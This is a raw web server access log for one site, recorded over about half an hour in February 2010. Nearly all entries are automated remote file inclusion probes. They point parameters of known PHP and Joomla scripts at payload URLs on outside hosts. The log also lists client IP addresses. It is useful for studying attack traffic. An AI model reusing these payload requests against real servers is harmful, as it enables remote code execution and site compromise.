220.73.144.196 - - [13/Feb/2010:05:10:47 -0800] "GET /logs/access_100127.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [13/Feb/2010:05:11:02 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [13/Feb/2010:05:11:02 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [13/Feb/2010:05:11:02 -0800] "GET /logs/access_100127.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:05:11:35 -0800] "GET /logs/access_100124.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:05:11:35 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [13/Feb/2010:05:11:35 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:05:12:06 -0800] "GET /logs/access_100103.log%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [13/Feb/2010:05:12:25 -0800] "GET ///bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [13/Feb/2010:05:12:25 -0800] "GET /logs////bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [13/Feb/2010:05:12:26 -0800] "GET /logs/access_100202.log%20%20////bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [13/Feb/2010:05:12:39 -0800] "GET /logs/access_100121.log%20%20////bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:05:12:41 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:05:12:41 -0800] "GET /logs/access_100126.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:05:12:41 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:05:12:53 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:05:12:53 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:05:12:53 -0800] "GET /logs/access_100126.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:05:13:43 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:05:13:43 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [13/Feb/2010:05:13:43 -0800] "GET /logs/access_100126.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [13/Feb/2010:05:15:02 -0800] "GET /logs/access_100126.log%20%20////bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [13/Feb/2010:05:15:26 -0800] "GET /logs/access_100128.log%20%20////bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [13/Feb/2010:05:17:19 -0800] "GET /logs/access_100118.log%20%20///spaw_control.class.php?spaw_root=http://www.transchool.com/n/data/session/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [13/Feb/2010:05:17:19 -0800] "GET /logs///spaw_control.class.php?spaw_root=http://www.transchool.com/n/data/session/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.36.36 - - [13/Feb/2010:05:17:19 -0800] "GET //spaw_control.class.php?spaw_root=http://www.transchool.com/n/data/session/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.61.181.34 - - [13/Feb/2010:05:17:47 -0800] "GET /logs/access_100119.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.61.181.34 - - [13/Feb/2010:05:17:47 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.61.181.34 - - [13/Feb/2010:05:17:47 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [13/Feb/2010:05:17:56 -0800] "GET /logs/access_100115.log%20%20//com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [13/Feb/2010:05:17:56 -0800] "GET /logs//com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [13/Feb/2010:05:17:56 -0800] "GET /com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [13/Feb/2010:05:18:05 -0800] "GET /com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [13/Feb/2010:05:18:05 -0800] "GET /logs//com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [13/Feb/2010:05:18:06 -0800] "GET /logs/access_100115.log%20%20//com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:05:18:30 -0800] "GET /logs//com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:05:18:30 -0800] "GET /logs/access_100115.log//com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:05:18:31 -0800] "GET /com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:05:18:58 -0800] "GET /logs/access_100112.log%20%20//?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:05:18:58 -0800] "GET /logs//?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:05:18:58 -0800] "GET /?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:05:19:08 -0800] "GET /logs/access_100124.log%20%20//?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:05:20:45 -0800] "GET /?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:05:20:45 -0800] "GET /logs/access_100112.log%20%20//?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:05:20:45 -0800] "GET /logs//?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [13/Feb/2010:05:20:52 -0800] "GET /logs/access_100124.log%20%20//?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:05:20:59 -0800] "GET /com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:05:20:59 -0800] "GET /logs//com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:05:20:59 -0800] "GET /logs/access_100115.log//com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:05:24:33 -0800] "GET //write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:05:24:33 -0800] "GET /logs///write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:05:24:33 -0800] "GET /logs/access_100129.log///write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [13/Feb/2010:05:24:33 -0800] "GET /logs/access_100202.log///write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [13/Feb/2010:05:25:17 -0800] "GET /logs/access_100116.log/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [13/Feb/2010:05:25:17 -0800] "GET /logs/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [13/Feb/2010:05:25:17 -0800] "GET /error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [13/Feb/2010:05:25:17 -0800] "GET /logs/access_100116.log/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [13/Feb/2010:05:25:17 -0800] "GET /error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [13/Feb/2010:05:25:17 -0800] "GET /logs/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [13/Feb/2010:05:25:19 -0800] "GET /logs/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [13/Feb/2010:05:25:19 -0800] "GET /error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [13/Feb/2010:05:25:20 -0800] "GET /logs/access_100116.log%20%20/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [13/Feb/2010:05:25:20 -0800] "GET /error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [13/Feb/2010:05:25:20 -0800] "GET /logs/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [13/Feb/2010:05:25:22 -0800] "GET /logs/access_100116.log/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [13/Feb/2010:05:25:26 -0800] "GET /logs/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [13/Feb/2010:05:25:26 -0800] "GET /logs/access_100116.log%20%20/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [13/Feb/2010:05:25:26 -0800] "GET /error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [13/Feb/2010:05:25:30 -0800] "GET /error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [13/Feb/2010:05:25:30 -0800] "GET /logs/access_100116.log%20%20/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [13/Feb/2010:05:25:30 -0800] "GET /logs/error.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.191.4 - - [13/Feb/2010:05:26:12 -0800] "GET /logs/access_100118.log%20%20/playing.php/common/db.php?commonpath=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.191.4 - - [13/Feb/2010:05:26:12 -0800] "GET /playing.php/common/db.php?commonpath=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.191.4 - - [13/Feb/2010:05:26:12 -0800] "GET /logs/playing.php/common/db.php?commonpath=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.22.76.28 - - [13/Feb/2010:05:26:23 -0800] "GET /playing.php/common/db.php?commonpath=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.22.76.28 - - [13/Feb/2010:05:26:23 -0800] "GET /logs/playing.php/common/db.php?commonpath=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.22.76.28 - - [13/Feb/2010:05:26:23 -0800] "GET /logs/access_100118.log%20%20/playing.php/common/db.php?commonpath=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [13/Feb/2010:05:26:30 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.hantechsys.com/board/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [13/Feb/2010:05:26:30 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.hantechsys.com/board/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [13/Feb/2010:05:26:30 -0800] "GET /logs/access_100104.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.hantechsys.com/board/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.80.214.147 - - [13/Feb/2010:05:26:37 -0800] "GET /logs/access_100202.log//bbs/write_update.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.80.214.147 - - [13/Feb/2010:05:26:37 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.80.214.147 - - [13/Feb/2010:05:26:37 -0800] "GET /bbs/write_update.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.80.214.147 - - [13/Feb/2010:05:26:37 -0800] "GET /logs/access_100129.log//bbs/write_update.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [13/Feb/2010:05:26:43 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.hantechsys.com/board/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [13/Feb/2010:05:26:43 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.hantechsys.com/board/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [13/Feb/2010:05:26:43 -0800] "GET /logs/access_100104.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.hantechsys.com/board/id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.191.4 - - [13/Feb/2010:05:26:44 -0800] "GET /logs/access_100109.log%20%20/playing.php/common/db.php?commonpath=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.22.76.28 - - [13/Feb/2010:05:26:53 -0800] "GET /logs/access_100109.log%20%20/playing.php/common/db.php?commonpath=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [13/Feb/2010:05:27:44 -0800] "GET ///bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [13/Feb/2010:05:27:45 -0800] "GET /logs/access_100202.log%20%20////bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [13/Feb/2010:05:27:45 -0800] "GET /logs////bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [13/Feb/2010:05:27:59 -0800] "GET /logs/access_100121.log%20%20////bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:05:28:38 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:05:28:38 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:05:28:43 -0800] "GET /logs/access_100112.log%20%20/e404.php?DOCUMENT_ROOT=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.61.181.34 - - [13/Feb/2010:05:28:52 -0800] "GET /logs/access_100121.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:05:28:59 -0800] "GET /logs/access_100103.log%20%20/e404.php?DOCUMENT_ROOT=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [13/Feb/2010:05:30:06 -0800] "GET /logs/access_100126.log%20%20////bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [13/Feb/2010:05:30:23 -0800] "GET /logs/access_100128.log%20%20////bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.22.76.28 - - [13/Feb/2010:05:30:41 -0800] "GET /logs/access_100118.log/playing.php/common/db.php?commonpath=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.191.4 - - [13/Feb/2010:05:30:57 -0800] "GET /logs/access_100118.log/playing.php/common/db.php?commonpath=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.55.191.4 - - [13/Feb/2010:05:31:02 -0800] "GET /logs/access_100109.log/playing.php/common/db.php?commonpath=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.22.76.28 - - [13/Feb/2010:05:31:04 -0800] "GET /logs/access_100109.log/playing.php/common/db.php?commonpath=http://www.vitrineavenue.com/includes/js/dtree/img/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:05:40:59 -0800] "GET /logs/access_100111.log//errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.0" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:05:40:59 -0800] "GET /errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
87.106.241.31 - - [13/Feb/2010:05:40:59 -0800] "GET /logs//errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
220.73.144.196 - - [13/Feb/2010:05:41:17 -0800] "GET /logs/access_100104.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [13/Feb/2010:05:41:17 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [13/Feb/2010:05:41:17 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [13/Feb/2010:05:42:10 -0800] "GET /logs/?board_skin_path=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [13/Feb/2010:05:42:10 -0800] "GET /logs/access.log%20%20/?board_skin_path=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [13/Feb/2010:05:42:10 -0800] "GET /?board_skin_path=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [13/Feb/2010:05:42:12 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [13/Feb/2010:05:42:12 -0800] "GET /logs/access_100104.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [13/Feb/2010:05:42:12 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [13/Feb/2010:05:42:32 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [13/Feb/2010:05:42:32 -0800] "GET /logs/access_100104.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [13/Feb/2010:05:42:32 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [13/Feb/2010:05:44:25 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
